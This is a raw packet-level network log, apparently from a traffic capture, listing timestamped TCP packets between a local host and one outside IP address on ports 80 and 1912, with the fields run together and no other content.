                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080461979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080496073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080523014 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080528975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080563068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080595016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080622911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080630064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080660105 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081172943 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081221104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081229925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081278086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081310987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081340075 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081345081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081378937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081412077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081444979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081475019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081480026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081516027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.081543922 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082168102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082202911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082236052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082262993 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082268953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082297087 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082302094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082336903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082364082 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082369089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082401037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082427979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082433939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082468033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.082496881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083168030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083201885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083230019 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083235025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083268881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083296061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083302975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083359957 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083389997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083393097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083425999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083453894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083460093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083493948 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083718061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083901882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083937883 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083966017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.083991051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084024906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084053040 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084059000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084105968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084137917 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084172964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084206104 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084208965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084240913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084269047 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084923983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084958076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084986925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.084992886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085026026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085052967 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085059881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085093975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085124016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085127115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085161924 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085194111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085228920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085258007 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085751057 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085823059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085843086 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085856915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085908890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085942984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085968971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085974932 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.085999012 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086008072 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086044073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086076975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086097956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086112022 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086112022 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086317062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086765051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086801052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086833954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086867094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086899996 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086930990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086930990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086934090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.086966991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087004900 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087033033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087038994 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087068081 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087073088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087151051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087632895 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087686062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087738991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087765932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087771893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087806940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087833881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087841988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087874889 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087909937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087937117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087943077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.087976933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088004112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088532925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088536978 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088578939 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088649988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088684082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088716030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088723898 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088746071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088749886 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088783026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088818073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088845968 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088850975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088885069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088908911 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.088944912 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089512110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089529037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089545012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089560986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089576006 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089586020 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089591980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089598894 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089607000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089622974 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089637995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089653969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.089659929 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090226889 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090401888 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090419054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090434074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090450048 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090465069 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090471983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090481043 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090496063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090507984 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090522051 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.090569019 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091353893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091370106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091387033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091402054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091414928 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091428041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091454983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091471910 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091480970 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091485977 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091504097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091514111 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.091527939 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092165947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092183113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092238903 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092255116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092269897 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092284918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092293024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.092382908 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093080044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093096018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093163967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093179941 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093183041 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093195915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093204975 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093210936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093254089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093270063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093271017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.093291998 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094010115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094036102 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094078064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094080925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094094992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094153881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094510078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094526052 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094705105 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.094719887 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.095088005 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.095530987 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.095547915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.095602989 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.096661091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.096676111 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.096724987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.097852945 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.097872019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.097901106 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.099019051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.099035025 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.099248886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.100219965 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.100254059 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.100281954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.101417065 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.101449966 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.101475954 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.102477074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.102577925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.103247881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.103884935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.103921890 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.103950024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.104870081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.104906082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.104937077 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.105988979 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.106048107 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.106129885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.107218027 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.107253075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.107281923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.108226061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.108305931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.108381033 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.109414101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.109524012 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.109658957 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.110677958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.110712051 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.110743046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.111756086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.111819983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.111891985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.112967968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.113078117 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.113127947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.161360979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198056936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198092937 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198333979 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198429108 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198482037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.198920965 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.199695110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.199809074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.200043917 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.200879097 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.200932980 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.201106071 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.201996088 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.202117920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.202234983 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.203195095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.203263998 CET8049708185.81.68.147192.168.2.5
